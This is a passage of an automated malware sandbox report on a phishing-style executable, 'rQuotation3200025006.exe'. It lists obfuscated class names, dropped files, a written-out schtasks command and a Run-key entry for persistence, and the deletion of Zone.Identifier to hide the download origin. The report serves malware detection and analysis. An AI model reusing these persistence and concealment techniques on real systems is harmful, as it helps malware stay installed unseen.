                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, SIQfwITd9ei2CpANlp.csHigh entropy of concatenated method names: 'pQDIFusNum', 'cmPIM6Or55', 'ex3I4ZgLkW', 'UpXIswQFrs', 'jyGI3FVxnK', 'b9DIhsPulk', 'U6IIEdvaEM', 'vYdItAF6DL', 'HIKIiiTltH', 'doEIPK629q'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, AlgpF0sIMI7wBJ03Gu.csHigh entropy of concatenated method names: 'AELpBKGQsO', 'sqJprkPo4o', 'og8pZ39RM4', 'o8WpuhuwR5', 'CWnpIRHmag', 'TrDpQY3hdW', 'H8VpyaYXBt', 'UkieEp5Mei', 'RSjetoDFPm', 'M8ueiY9Tv5'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, A99IY269OrPLqVFrp2.csHigh entropy of concatenated method names: 'VWnQJNfWBW', 'v0hQALLcqH', 'GilXmHukg6', 'G0uX5W1cYN', 'TyjXc3AY6b', 'GUdXSnoV37', 'Jw2XOw11mR', 'yEkXLxAFD5', 'sNfXC7fh4w', 'fvHXUCBILP'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, jy272HJXpTWWhUZ0r3.csHigh entropy of concatenated method names: 'eViXYOW3rR', 'CLUXokd0fa', 'spFXKTBYHt', 'YwPXkXByRW', 'nLaXTtwSZj', 'zHGX9eDSND', 'GXIXnZTY7a', 'c6aXe4jigC', 'QtsXp9R8wI', 'DUnX1gArEW'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, yUXuXNUq68P96YSGRh.csHigh entropy of concatenated method names: 'Dispose', 'tDpBipLP9D', 'aTFVDRF0cm', 'Uc1xx1lYd4', 'k4yBPx91Au', 'S9ZBzBhCMu', 'ProcessDialogKey', 'F1SVGp5Zl9', 'vNHVBKayAi', 'ziRVVYSItn'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, vpCmup94T7VrxmPluJ.csHigh entropy of concatenated method names: 'ToString', 'C7R9wLoLx6', 'bc69DxrQMw', 'NIk9mQtVNn', 'eLw95IwZun', 'hP79cb1omf', 'T239S70NAo', 'cUV9OwjF9a', 'VyT9L12h06', 'fHt9CXOlSJ'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, nn0B2Ei9tlVnIbvlnQ.csHigh entropy of concatenated method names: 'PKOqgA3dKi', 'bvDqlLnOkX', 'TBEqddkUxe', 'wiAqYuRSj4', 'IoWqJidZLS', 'uiWqoIGN28', 'VlBqA2joqV', 'TYFqKjDTgV', 'dlfqkE8Yqf', 't3SqvoGdJK'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, astpH0IZwtMO22Sbdr.csHigh entropy of concatenated method names: 'rGWeuX4peC', 'IwaeI5wHSi', 'fJReX62T2l', 'gEveQZkvZF', 'cj6eyspwy4', 'dAIeqVk9rB', 'Rj5eHalvte', 'BVbeaIEYHX', 'Iufe8yDHwg', 'PLRe7vyQx0'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, IsXVmmk7SsweRGxjwD.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'CCpVi9kBDY', 'zf4VPmQ3fT', 'yJQVzDJk4P', 'j9krGKrrWH', 'v2qrB1Y7xQ', 'MBGrV3xpEc', 'USprr8fDJD', 'Kd559AYYiqVDk2EXsTc'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, uGs8lVOZpO8VCg0kB1.csHigh entropy of concatenated method names: 'rlUTUCYMft', 'n3jT6IsyPB', 'oVgTFiq9Fp', 'eXrTM8R9BX', 'uDcTDMnNyi', 'sUuTmtow7h', 'CCwT56xB2S', 'a2mTcNsqA8', 'RyETSmMEl4', 'jC6TOwShGk'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, OWdE7xw0tiiGCQCYNU.csHigh entropy of concatenated method names: 'qeSBqjCPlZ', 'Q2dBHUnVTJ', 'WbOB8s7lbK', 'zeWB7DCKVY', 'gYPBTn7q4J', 'OY7B9oC5ZK', 'GlTAKmQGI5iXqkYVxQ', 'Yloi4TMxjBLjKV7ToY', 'H0uBBMWCV4', 'iSjBra1CpO'
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeFile created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJump to dropped file
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeFile created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp"
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeFile opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeFile opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | delete
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
